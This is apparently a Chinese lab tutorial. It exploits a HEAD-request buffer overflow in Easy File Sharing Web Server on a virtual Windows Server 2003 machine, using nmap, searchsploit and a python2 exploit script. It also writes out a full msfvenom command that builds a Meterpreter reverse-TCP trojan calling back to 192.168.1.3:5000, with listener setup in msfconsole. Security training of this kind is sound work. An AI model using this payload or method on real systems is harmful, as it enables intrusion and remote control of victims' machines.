目录
二 利用Metasploit框架下的msfvenom工具生成payload
一 扫描服务器漏洞并用脚本展开攻击
在虚拟机winserver2003下载好Easy File Sharing Web Server后进行服务器的搭建
搭建完后使用nmap中的-sV看看端口的服务以及版本
接下来使用searchsploit查看EasyFileSharing存在的漏洞,以及对应的攻击脚本
这是攻击前winserver上的页面
攻击者进行对目标端口的攻击,这里特地标明使用python2,因为电脑可能安装有python2和python3两个版本的python因此虚拟机这边率先使用python3会导致语法上的不兼容从而导致无法执行这个python2写的版本(一句话:此处没有向下兼容)
当进行攻击之后服务器拒绝服务了并且内存地址进行了跳转,这里攻击者利用的是 HEAD 请求的缓冲区溢出漏洞。
脚本里面的具体shellcode
二 利用Metasploit框架下的msfvenom工具生成payload
上面这个脚本具有针对性。不同的payload类型可以用于不同的攻击场景和漏洞利用,我们可以利用msfvenom根据需求生成恶意软件载荷,其中
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.3 lport=5000 -f exe -o /root/payload.exe
这个命令使用msfvenom来生成一个Windows平台的Meterpreter反向TCP的payload。(即生成了反向连接的木马,用户运行了就会连接到攻击者的指定地址和端口)
-p接的是攻击的载荷类型,即针对Windows操作系统的Meterpreter反向TCP payload,Meterpreter是Metasploit框架中的一种强大的交互式Shell,可以在远程系统上执行各种命令和操作。反向TCP意味着payload将尝试连接到指定的IP地址和端口,而不是等待目标系统主动连接
lhost会告诉payload入侵后与这个IP地址上的Metasploit监听器进行通信
lport是指定Metasploit监听器侦听来自payload的连接的端口
-f接的是生成的payload的文件格式
-o接的是输出文件的路径和名称
三 Kali中启动主控端
首先需要使用msfconsole指令进入Metasploit框架
然后设置相应的监听端口
最后,当受害者运行msfvenom生成的反向连接的payload后,kali就可以启动主控端进行监听。
show_mount命令通常用于显示受感染系统上的挂载点和相关信息。这可以帮助攻击者了解目标系统上已经挂载的文件系统。